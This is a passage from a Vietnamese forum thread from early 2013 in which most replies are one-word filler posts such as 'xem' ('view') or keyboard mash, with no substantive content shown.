bablack» Thàñh Vïêñ Mới

default
dddddddddddddddddddd

Trả lời trích dẫnTrả lời

#14on Tue Jan 01, 2013 12:14 pm

avatar

xacthuao1998» Thàñh Vïêñ Mới

default
rew

Trả lời trích dẫnTrả lời

#15on Tue Jan 01, 2013 12:15 pm

avatar

xacthuao1998» Thàñh Vïêñ Mới

default
rew

Trả lời trích dẫnTrả lời

#16on Wed Jan 09, 2013 12:01 am

avatar

loveclub» Thàñh Vïêñ Mới

default
xem

Trả lời trích dẫnTrả lời

#17on Thu Jan 10, 2013 8:17 am

avatar

khoai.hoai» Thàñh Vïêñ Mới

default
xem

4rkingofgame.5forum.net

cổng chia sẻ thông tin giải trí tổng hợp
Trả lời trích dẫnTrả lời

#18on Fri Jan 11, 2013 12:30 am

avatar

KuroTsuki» Thàñh Vïêñ Mới

default
xem

Trả lời trích dẫnTrả lời

#19on Wed Jan 16, 2013 5:03 pm

avatar

procp» Thàñh Vïêñ Mới

default
xem

Trả lời trích dẫnTrả lời

#20on Fri Feb 08, 2013 11:29 pm

avatar

manhanhem» Thàñh Vïêñ Mới

default
dasdasdas das da s Bó tay lun

Trả lời trích dẫnTrả lời

#21on Sun Feb 10, 2013 4:19 pm

avatar

CodeMaster» Thàñh Vïêñ Mới

default
Xem

Trả lời trích dẫnTrả lời

#22on Wed Feb 20, 2013 6:18 pm

Susu_cry» Thàñh Vïêñ Mới

default
xem

Trả lời trích dẫnTrả lời

#23on Fri Feb 22, 2013 11:55 am

avatar

bikakavt» Thàñh Vïêñ Mới

default
xem

Trả lời trích dẫnTrả lời

#24on Sun Feb 24, 2013 6:32 am

avatar

SenT» Thàñh Vïêñ Mới

default
xwb

Trả lời trích dẫnTrả lời

#25on Tue Mar 12, 2013 2:39 pm

avatar

quys2yen1112» Thàñh Vïêñ Mới

default
xem

Trả lời trích dẫnTrả lời

Sponsored content
default

Trả lời trích dẫnTrả lời

Xem chủ đề cũ hơn Xem chủ đề mới hơn Về Đầu Trang  Thông điệp [Trang 1 trong tổng số 4 trang]

Chuyển đến trang : 1, 2, 3, 4  Next

Permissions in this forum:
Bạn không có quyền trả lời bài viết